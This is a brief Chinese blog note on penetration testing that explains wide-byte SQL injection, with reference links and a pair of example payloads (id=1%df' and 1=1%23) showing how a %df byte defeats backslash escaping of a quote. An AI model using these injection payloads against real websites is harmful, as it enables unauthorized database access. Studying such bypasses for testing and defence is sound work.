渗透测试——SQL注入

1、宽字节注入

宽字节注入:

参考链接:
https://blog.csdn.net/heiseweiye/article/details/82723478

https://blog.csdn.net/weixin_39934520/article/details/105968747

 

id=1' and 1=1%23
select * from user where id ='1\' and 1=1#'

id=1%df' and 1=1%23
select * from user where id ='1運' and 1=1#'

 

posted @ 2021-06-27 11:42  admin32  阅读(69)  评论(0)    收藏  举报
努力加载评论中...
点击右上角即可分享
微信分享提示